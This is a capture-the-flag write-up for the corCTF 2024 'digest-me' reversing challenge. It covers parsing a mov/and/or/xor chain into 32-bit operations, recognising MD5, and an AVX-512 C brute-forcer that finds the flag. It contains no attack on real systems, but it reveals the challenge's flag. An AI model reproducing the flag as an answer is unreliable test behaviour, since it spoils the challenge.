            <span class="k">if</span> <span class="p">((</span><span class="n">eq</span> <span class="o">&gt;&gt;</span> <span class="n">i</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mi">1</span><span class="p">)</span>
                <span class="n">printf</span><span class="p">(</span><span class="s">"found: %.4s%.4s%.4s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">_x0</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="p">(</span><span class="kt">uint8_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">_x1</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="p">(</span><span class="kt">uint8_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">_x2</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="cp">#define A 62
#define NTHREADS 8
</span>
<span class="k">const</span> <span class="kt">char</span> <span class="n">ALPHABET</span><span class="p">[</span><span class="mi">64</span><span class="p">]</span> <span class="o">=</span> <span class="s">"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz00"</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">char</span> <span class="n">ALPHABET_S4</span><span class="p">[</span><span class="mi">50</span><span class="p">]</span> <span class="o">=</span> <span class="s">"012345ABCDEFGHIJKLMNOPQRSTUVabcdefghijklmnopqrstuv"</span><span class="p">;</span>

<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">search</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">arg</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">64</span><span class="p">)))</span> <span class="kt">uint32_t</span> <span class="n">_x0</span><span class="p">[</span><span class="mi">16</span><span class="p">],</span> <span class="n">_x1</span><span class="p">[</span><span class="mi">16</span><span class="p">],</span> <span class="n">_x2</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>

    <span class="kt">int</span> <span class="n">n</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">arg</span><span class="p">;</span>

    <span class="kt">int</span> <span class="n">start</span> <span class="o">=</span> <span class="n">n</span> <span class="o">*</span> <span class="p">(</span><span class="mi">50</span> <span class="o">/</span> <span class="n">NTHREADS</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">end</span> <span class="o">=</span> <span class="n">n</span> <span class="o">!=</span> <span class="n">NTHREADS</span> <span class="o">-</span> <span class="mi">1</span> <span class="o">?</span> <span class="p">(</span><span class="n">n</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="mi">50</span> <span class="o">/</span> <span class="n">NTHREADS</span><span class="p">)</span> <span class="o">:</span> <span class="mi">50</span><span class="p">;</span>

    <span class="n">printf</span><span class="p">(</span><span class="s">"starting search [%d, %d)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">start</span><span class="p">,</span> <span class="n">end</span><span class="p">);</span>

    <span class="kt">uint8_t</span> <span class="n">flag</span><span class="p">[</span><span class="mi">12</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">flag</span><span class="p">[</span><span class="mi">11</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x80</span><span class="p">;</span>

    <span class="k">const</span> <span class="n">__m512i</span> <span class="n">Y0</span> <span class="o">=</span> <span class="n">_mm512_setr_epi32</span><span class="p">(</span><span class="mi">48</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">51</span><span class="p">,</span> <span class="mi">52</span><span class="p">,</span> <span class="mi">53</span><span class="p">,</span> <span class="mi">54</span><span class="p">,</span> <span class="mi">55</span><span class="p">,</span> <span class="mi">56</span><span class="p">,</span> <span class="mi">57</span><span class="p">,</span> <span class="mi">65</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">67</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">69</span><span class="p">,</span> <span class="mi">70</span><span class="p">);</span>
    <span class="k">const</span> <span class="n">__m512i</span> <span class="n">Y1</span> <span class="o">=</span> <span class="n">_mm512_setr_epi32</span><span class="p">(</span><span class="mi">71</span><span class="p">,</span> <span class="mi">72</span><span class="p">,</span> <span class="mi">73</span><span class="p">,</span> <span class="mi">74</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">76</span><span class="p">,</span> <span class="mi">77</span><span class="p">,</span> <span class="mi">78</span><span class="p">,</span> <span class="mi">79</span><span class="p">,</span> <span class="mi">80</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">82</span><span class="p">,</span> <span class="mi">83</span><span class="p">,</span> <span class="mi">84</span><span class="p">,</span> <span class="mi">85</span><span class="p">,</span> <span class="mi">86</span><span class="p">);</span>
    <span class="k">const</span> <span class="n">__m512i</span> <span class="n">Y2</span> <span class="o">=</span> <span class="n">_mm512_setr_epi32</span><span class="p">(</span><span class="mi">87</span><span class="p">,</span> <span class="mi">88</span><span class="p">,</span> <span class="mi">89</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">97</span><span class="p">,</span> <span class="mi">98</span><span class="p">,</span> <span class="mi">99</span><span class="p">,</span> <span class="mi">100</span><span class="p">,</span> <span class="mi">101</span><span class="p">,</span> <span class="mi">102</span><span class="p">,</span> <span class="mi">103</span><span class="p">,</span> <span class="mi">104</span><span class="p">,</span> <span class="mi">105</span><span class="p">,</span> <span class="mi">106</span><span class="p">,</span> <span class="mi">107</span><span class="p">,</span> <span class="mi">108</span><span class="p">);</span>
    <span class="k">const</span> <span class="n">__m512i</span> <span class="n">Y3</span> <span class="o">=</span> <span class="n">_mm512_setr_epi32</span><span class="p">(</span><span class="mi">109</span><span class="p">,</span> <span class="mi">110</span><span class="p">,</span> <span class="mi">111</span><span class="p">,</span> <span class="mi">112</span><span class="p">,</span> <span class="mi">113</span><span class="p">,</span> <span class="mi">114</span><span class="p">,</span> <span class="mi">115</span><span class="p">,</span> <span class="mi">116</span><span class="p">,</span> <span class="mi">117</span><span class="p">,</span> <span class="mi">118</span><span class="p">,</span> <span class="mi">119</span><span class="p">,</span> <span class="mi">120</span><span class="p">,</span> <span class="mi">121</span><span class="p">,</span> <span class="mi">122</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">48</span><span class="p">);</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">c0</span> <span class="o">=</span> <span class="n">start</span><span class="p">;</span> <span class="n">c0</span> <span class="o">&lt;</span> <span class="n">end</span><span class="p">;</span> <span class="n">c0</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">flag</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET_S4</span><span class="p">[</span><span class="n">c0</span><span class="p">];</span>
        <span class="n">flag</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET_S4</span><span class="p">[</span><span class="n">c0</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
        <span class="n">flag</span><span class="p">[</span><span class="mi">7</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET_S4</span><span class="p">[</span><span class="n">c0</span><span class="p">]</span> <span class="o">+</span> <span class="mi">4</span><span class="p">;</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">c1</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">c1</span> <span class="o">&lt;</span> <span class="n">A</span><span class="p">;</span> <span class="n">c1</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">flag</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">flag</span><span class="p">[</span><span class="mi">10</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET</span><span class="p">[</span><span class="n">c1</span><span class="p">];</span>
            <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">c2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">c2</span> <span class="o">&lt;</span> <span class="n">A</span><span class="p">;</span> <span class="n">c2</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">flag</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="n">flag</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET</span><span class="p">[</span><span class="n">c2</span><span class="p">];</span>
                <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">c3</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">c3</span> <span class="o">&lt;</span> <span class="n">A</span><span class="p">;</span> <span class="n">c3</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">flag</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET</span><span class="p">[</span><span class="n">c3</span><span class="p">];</span>
                    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">c4</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">c4</span> <span class="o">&lt;</span> <span class="n">A</span><span class="p">;</span> <span class="n">c4</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
                        <span class="n">flag</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET</span><span class="p">[</span><span class="n">c4</span><span class="p">];</span>
                        <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">c5</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">c5</span> <span class="o">&lt;</span> <span class="n">A</span><span class="p">;</span> <span class="n">c5</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
                            <span class="n">flag</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET</span><span class="p">[</span><span class="n">c5</span><span class="p">];</span>

                            <span class="kt">uint32_t</span> <span class="o">*</span><span class="n">flag_u32</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="o">*</span><span class="p">)</span><span class="n">flag</span><span class="p">;</span>
                            <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">16</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
                                <span class="n">_x0</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">flag_u32</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
                                <span class="n">_x1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">flag_u32</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
                                <span class="n">_x2</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">flag_u32</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
                            <span class="p">}</span>

                            <span class="n">__m512i</span> <span class="n">x0</span> <span class="o">=</span> <span class="n">_mm512_load_si512</span><span class="p">(</span><span class="n">_x0</span><span class="p">);</span>
                            <span class="n">__m512i</span> <span class="n">x1</span> <span class="o">=</span> <span class="n">_mm512_load_si512</span><span class="p">(</span><span class="n">_x1</span><span class="p">);</span>
                            <span class="n">__m512i</span> <span class="n">x2</span> <span class="o">=</span> <span class="n">_mm512_load_si512</span><span class="p">(</span><span class="n">_x2</span><span class="p">);</span>

                            <span class="n">md5_avx512</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_or_si512</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">Y0</span><span class="p">));</span>
                            <span class="n">md5_avx512</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_or_si512</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">Y1</span><span class="p">));</span>
                            <span class="n">md5_avx512</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_or_si512</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">Y2</span><span class="p">));</span>
                            <span class="n">md5_avx512</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_or_si512</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">Y3</span><span class="p">));</span>
                        <span class="p">}</span>
                    <span class="p">}</span>
                <span class="p">}</span>
            <span class="p">}</span>
        <span class="p">}</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"checkpoint: %d (thread %d)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">c0</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">pthread_t</span> <span class="n">threads</span><span class="p">[</span><span class="n">NTHREADS</span><span class="p">];</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NTHREADS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">pthread_create</span><span class="p">(</span><span class="o">&amp;</span><span class="n">threads</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">search</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">i</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NTHREADS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">pthread_join</span><span class="p">(</span><span class="n">threads</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="nb">NULL</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>1hr 20mins later, it found the flag: <code class="language-plaintext highlighter-rouge">corctf{cPv3v8VfWbP}</code>. The full flag emerges when it is
submitted to <code class="language-plaintext highlighter-rouge">digestme</code>:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>./digestme
Welcome!
Please enter the flag here:
corctf<span class="o">{</span>cPv3v8VfWbP<span class="o">}</span>
Nice!

Full flag: corctf<span class="o">{</span>youtu.be/dQw4w9WgXcQ<span class="o">}</span>
</code></pre></div></div>

<h3 id="final-thoughts">Final thoughts</h3>

<p>Despite being so close to solving it in the end – and also costing us 6th place, I enjoyed every
part of the challenge, from converting the disassembly into bitwise operations and then 32-bit
integer arithmetic, to realizing it was MD5 all along, and even writing the bruteforcer that I
somehow messed up.</p>

<p>I do believe the challenge would have been better off with a smaller search space, because some
people (like me) don’t have strong CPUs or GPUs. On the other hand, I think performance optimization
is fun, especially when SIMD is involved.</p>

<p><img src="/assets/images/corctf2024/discord.png" alt="discord.png" /></p>]]></content><author><name>lydxn</name></author><summary type="html"><![CDATA[Having no solves yet in the rev category with one day remaining in corCTF 2024, I decided to have a gander at something that looked approachable. The two easiest challenges at the time by solve count were corMine: The Beginning and its sequel corMine 2: Revelations, which was a game of some sort. However, I eventually gave up after 5+ minutes trying to get the game to just run! But I guess I don’t feel so bad seeing as my teammates couldn’t figure it out either :’) corMine refusing to run without a GPU smh The next easiest one on the list was called digest-me, which is the topic of this post and what I poured most of my time on for the next 24 hours. Luckily, this one was a simple binary that asked you to input a flag, and told you whether it was correct. These kinds of programs are common enough in CTFs that they adopt a not-so-special name called a flag checker. Challenge The description gives us a few clues, perhaps it has something to do with hashing and bits (?), but otherwise just contains the average lore. FizzBuzz101 was innocently writing a new, top-secret compiler when his computer was Crowdstriked. Worse, the recovery key is behind a hasher that he wrote and compiled himself, and he can’t remember how the bits work! Can you help him get his life’s work back? Here is a sample interaction from the digestme binary: $ ./digestme Welcome! Please enter the flag here: corctf{what} Try again: corctf{potatoes} Try again: It’s too big One problem immediately came up when opening the program in Ghidra – it refused to decompile main()! Examining the disassembly to see what could possibly have went wrong, I was horrified to witness a chain of about 300,000 instructions consisting solely of mov, and, or and xor: Luckily, I worked around this by patching ret instructions near the top and bottom of main() to ensure Ghidra doesn’t try to decompile all of it. That allows us to finally see the start of the function. Brute force? Through a combination of static and dynamic analysis, I was able to constrain the flag to a set of preconditions that were enforced by those ifs: len(flag) == 19 flag[:7] == "corctf{" flag[8] == flag[17] flag[9] == flag[11] flag[7] == flag[16] + 1 flag[14] == flag[16] + 4 The short flag certainly raised my eyebrows about the possibility of brute force. There were 11 unknown bytes but 4 of those can be disregarded because of the extra constraints, for a total of 95^7 = 69,833,729,609,375 possible flags (assuming the flag is printable). However, it’s worth noting that each run would require at least 300,000 instructions, and 2 days would not nearly be enough to find the flag in time on my poor 4-core Intel-i5 laptop. The rest of the program is focused on executing the said 300,000 instructions, which judging by the disassembly just seems to be a bunch of operations on an array. A is initialized at the start via A = (byte *)calloc(1,100000), which allocates a zero-filled 100,000-byte array. The flag is then loaded into A by converting each byte inside corctf{...} into 8 bits, and then loading the bits starting from the offset *(A+0x940) in big-endian order. For those who speak Python, that looks something like this: A[0x940:0x998] = [(c &gt;&gt; i) &amp; 1 for c in code[7:-1] for i in range(7, -1, -1)] After the extremely long chain of array operations, the first 128 bits of A are converted into 4 32-bit integers (call them a, b, c, d). The flag checker outputs Nice! if c == 0x19c603b and d == 0x14353ce (A.K.A. the target condition). Reversing the elephant in the room Now that it was clear how the program was checking the flag, I worked on parsing the long array operations into something more readable. Once we had the instructions in a higher-level language, it would be possible in theory to rely on z3 to recover the flag for us. Instead of bashing Ghidra to decompile everything for us, I used capstone to parse the machine code into a clean disassembly: from capstone import * with open('digestme', 'rb') as f: binary = f.read() code = binary[0x1290:0xed854] cs = Cs(CS_ARCH_X86, CS_MODE_64) instructions = cs.disasm(code, 0) for inst in instructions: print(inst.mnemonic, inst.op_str) After combing through the output, I was surprised to find only two distinct groups of instructions. It was either a simple mov in the form, mov byte ptr [rax + X], Y which maps to A[X] = Y, or mov cl, byte ptr [rax + X] &lt;op&gt; cl, byte ptr [rax + Y] mov byte ptr [rax + Z], cl which maps to A[Z] = A[X] &lt;op&gt; A[Y] where &lt;op&gt; ∈ [and, or, xor]. This made it relatively easy to decompile with a little bit of regex: from capstone import * import re with open('digestme', 'rb') as f: binary = f.read() OP_MAP = {'and': '&amp;', 'or': '|', 'xor': '^'} code = binary[0x1290:0xed854] cs = Cs(CS_ARCH_X86, CS_MODE_64) instructions = cs.disasm(code, 0) commands = [] while (inst := next(instructions, None)) is not None: assert inst.mnemonic == 'mov' if m := re.fullmatch(r'byte ptr \[rax( \+ (\w+)|)\], ([01])', inst.op_str): out = int(m[2], 0) if m[2] else 0 val = int(m[3]) commands.append(f'A[{out:#x}] = {val}') else: m = re.fullmatch(r'cl, byte ptr \[rax( \+ (\w+)|)\]', inst.op_str) in1 = int(m[2], 0) if m[2] else 0 inst = next(instructions) m = re.fullmatch(r'cl, byte ptr \[rax( \+ (\w+)|)\]', inst.op_str) in2 = int(m[2], 0) if m[2] else 0 op = OP_MAP[inst.mnemonic] inst = next(instructions) m = re.fullmatch(r'byte ptr \[rax( \+ (\w+)|)\], cl', inst.op_str) out = int(m[2], 0) if m[2] else 0 commands.append(f'A[{out:#x}] = A[{in1:#x}] {op} A[{in2:#x}]') print(len(commands)) with open('commands.txt', 'w') as f: for cmd in commands: f.write(cmd + '\n') I also printed out the number of commands, which came out at a respectable 60,180. Still far from being ideal of course. Given the description of the challenge, I figured this was some hashing algorithm that was obfuscated by bit manipulations. Looking through the commands.txt file, I noticed that there was a lot of repetition. In fact, it almost always performed one of &amp;, |, or ^ in 32-bit chunks like this: A[0x0] = A[0xfa0] | A[0x100] A[0x1] = A[0xfa1] | A[0x101] A[0x2] = A[0xfa2] | A[0x102] A[0x3] = A[0xfa3] | A[0x103] ... A[0x1f] = A[0xfbf] | A[0x11f] However, there were also certain chunks that had all the operators combined in a mixed order, which strangely always came in groups of 157 that repeated ^, ^, &amp;, &amp;, | cylically. A[0xe7] = A[0xc7] ^ A[0x27] A[0xb40] = A[0xc7] &amp; A[0x27] A[0xb41] = A[0xc6] ^ A[0x26] A[0xe6] = A[0xb41] ^ A[0xb40] A[0xb40] = A[0xb41] &amp; A[0xb40] A[0xb41] = A[0xc6] &amp; A[0x26] A[0xb40] = A[0xb41] | A[0xb40] A[0xb41] = A[0xc5] ^ A[0x25] A[0xe5] = A[0xb41] ^ A[0xb40] A[0xb40] = A[0xb41] &amp; A[0xb40] A[0xb41] = A[0xc5] &amp; A[0x25] A[0xb40] = A[0xb41] | A[0xb40] A[0xb41] = A[0xc4] ^ A[0x24] A[0xe4] = A[0xb41] ^ A[0xb40] A[0xb40] = A[0xb41] &amp; A[0xb40] At first, this made me scratch my head as it did not seem to “fit” with the rest of the output. But then I realized that this obscure-looking block of code was actually implementing a 32-bit adder! This finally made sense with the rest of the logic, and once I was certain that these were all indeed 32-bit operations implemented on bits, I quickly hacked together a second program to convert the 60,180 commands into a new set of commands performed on 32-bit integers: import re def MOV(cmd): m = re.fullmatch(r'A\[(\w+)\] = ([01])', cmd) if m is None: return None return int(m[1], 0), int(m[2]) def BITW(cmd): m = re.fullmatch(r'A\[(\w+)\] = A\[(\w+)\] ([\^|&amp;]) A\[(\w+)\]', cmd) if m is None: return None return int(m[1], 0), m[3], int(m[2], 0), int(m[4], 0) with open('commands.txt', 'r') as f: commands = list(map(str.rstrip, f)) ncommands = [] idx = 0 while idx &lt; len(commands): cmd = commands[idx] if MOV(cmd): chunk = commands[idx:idx+32] outs, vals = zip(*[MOV(cmd) for cmd in chunk]) assert outs == tuple(range(outs[0], outs[-1] - 1, -1)) and outs[-1] &amp; 31 == 0 val = 0 for o, v in zip(outs, vals): i = o &amp; 31 val |= v &lt;&lt; 8 * (i // 8) + 7 - (i % 8) ncommands.append(f'A[{outs[-1]&gt;&gt;5}] = {val:#x}') idx += 32 elif BITW(cmd) and BITW(cmd)[1] == BITW(commands[idx + 1])[1]: chunk = commands[idx:idx+32] outs, ops, in1s, in2s = zip(*[BITW(cmd) for cmd in chunk]) if outs[0] &amp; 31 == 0: assert outs == tuple(range(outs[0], outs[-1] + 1)) and outs[0] &amp; 31 == 0 assert len(set(ops)) == 1 assert in1s == tuple(range(in1s[0], in1s[-1] + 1)) and in1s[0] &amp; 31 == 0 assert in2s == tuple(range(in2s[0], in2s[-1] + 1)) and in2s[0] &amp; 31 == 0 ncommands.append(f'A[{outs[0]&gt;&gt;5}] = A[{in1s[0]&gt;&gt;5}] {ops[0]} A[{in2s[0]&gt;&gt;5}]') else: rotl = (outs.index(min(outs) + 7) + 1) &amp; 31 ncommands.append(f'A[{outs[0]&gt;&gt;5}] = rotl(A[{in1s[0]&gt;&gt;5}] {ops[0]} A[{in2s[0]&gt;&gt;5}], {rotl})') assert [in1s[24 - 8 * (i // 8) + (i % 8)] - min(in1s) == i for i in range(32)] assert [in2s[24 - 8 * (i // 8) + (i % 8)] - min(in2s) == i for i in range(32)] idx += 32 else: chunk = commands[idx:idx+157] outs, ops, in1s, in2s = zip(*[BITW(cmd) for cmd in chunk]) assert outs.count(0xb40) == 63 and outs.count(0xb41) == 62 assert ops == ('^', '&amp;') + ('^', '^', '&amp;', '&amp;', '|') * 31 assert in1s.count(0xb40) == 0 and in1s.count(0xb41) == 93 assert in2s.count(0xb40) == 93 and in2s.count(0xb41) == 0 assert outs[33] &amp; 31 == 0 and in1s[32] &amp; 31 == 0 and in2s[32] &amp; 31 == 0 ncommands.append(f'A[{outs[33]&gt;&gt;5}] = A[{in1s[32]&gt;&gt;5}] + A[{in2s[32]&gt;&gt;5}]') idx += 157 print(len(ncommands)) with open('commands2.txt', 'w') as f: for cmd in ncommands: f.write(cmd + '\n') There were some tricky implementation details like rotl() somehow being part of the logic, but in the end we are left with a much simpler program with “only” 865 lines: A[9] = 0xffffffff A[125] = 0x0 A[126] = 0x0 A[127] = 0x0 A[128] = 0x0 A[0] = A[125] | A[8] A[1] = A[126] | A[8] A[2] = A[127] | A[8] A[3] = A[128] | A[8] A[10] = 0xd76aa478 A[11] = 0xe8c7b756 A[12] = 0x242070db A[13] = 0xc1bdceee A[14] = 0xf57c0faf A[15] = 0x4787c62a A[16] = 0xa8304613 A[17] = 0xfd469501 A[18] = 0x698098d8 A[19] = 0x8b44f7af A[20] = 0xffff5bb1 A[21] = 0x895cd7be A[22] = 0x6b901122 A[23] = 0xfd987193 A[24] = 0xa679438e A[25] = 0x49b40821 A[26] = 0xf61e2562 A[27] = 0xc040b340 A[28] = 0x265e5a51 A[29] = 0xe9b6c7aa A[30] = 0xd62f105d A[31] = 0x2441453 A[32] = 0xd8a1e681 A[33] = 0xe7d3fbc8 A[34] = 0x21e1cde6 A[35] = 0xc33707d6 A[36] = 0xf4d50d87 A[37] = 0x455a14ed A[38] = 0xa9e3e905 A[39] = 0xfcefa3f8 A[40] = 0x676f02d9 A[41] = 0x8d2a4c8a A[42] = 0xfffa3942 A[43] = 0x8771f681 A[44] = 0x6d9d6122 A[45] = 0xfde5380c A[46] = 0xa4beea44 A[47] = 0x4bdecfa9 A[48] = 0xf6bb4b60 A[49] = 0xbebfbc70 A[50] = 0x289b7ec6 A[51] = 0xeaa127fa A[52] = 0xd4ef3085 A[53] = 0x4881d05 A[54] = 0xd9d4d039 A[55] = 0xe6db99e5 A[56] = 0x1fa27cf8 A[57] = 0xc4ac5665 A[58] = 0xf4292244 A[59] = 0x432aff97 A[60] = 0xab9423a7 A[61] = 0xfc93a039 A[62] = 0x655b59c3 A[63] = 0x8f0ccc92 A[64] = 0xffeff47d A[65] = 0x85845dd1 A[66] = 0x6fa87e4f A[67] = 0xfe2ce6e0 A[68] = 0xa3014314 A[69] = 0x4e0811a1 A[70] = 0xf7537e82 A[71] = 0xbd3af235 A[72] = 0x2ad7d2bb A[73] = 0xeb86d391 A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[74] A[4] = A[6] + A[10] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 7) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[75] A[4] = A[6] + A[11] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 12) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[76] A[4] = A[6] + A[12] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 17) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[77] A[4] = A[6] + A[13] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 22) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[78] A[4] = A[6] + A[14] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 7) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[79] A[4] = A[6] + A[15] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 12) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[80] A[4] = A[6] + A[16] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 17) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + 